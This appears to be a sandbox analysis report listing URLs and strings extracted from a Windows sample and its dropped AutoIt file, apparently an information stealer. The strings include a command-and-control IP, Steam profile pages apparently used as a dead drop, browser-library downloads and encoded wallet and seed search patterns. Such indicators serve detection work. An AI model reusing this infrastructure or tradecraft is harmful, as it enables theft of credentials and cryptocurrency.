                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://ocsp.digicert.com0H
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://ocsp.digicert.com0I
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000000.1408696187.0000000000F39000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: mozglue[1].dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                Source: Spice.pif, 0000000B.00000002.2627170786.000000001024D000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://37.27.87.155
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/;
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/GHDGDAKECAKJEHCGDAA
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dll(e
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/msvcp140.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nss3.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/o
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/p
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ramData
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000493D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AAKKE
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155CAKJE
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155CVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:
                Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155KKKEH
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155VWXYZ12345678900)
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155ta
                Source: DGDAEHCB.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: DGDAEHCB.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: DGDAEHCB.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: DGDAEHCB.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=c4Un
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&amp
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=XPgJuNunk65
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                Source: DGDAEHCB.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: DGDAEHCB.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: DGDAEHCB.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: https://mozilla.org0/
                Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/O
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/o
                Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
                Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199677575543j
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                Source: 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
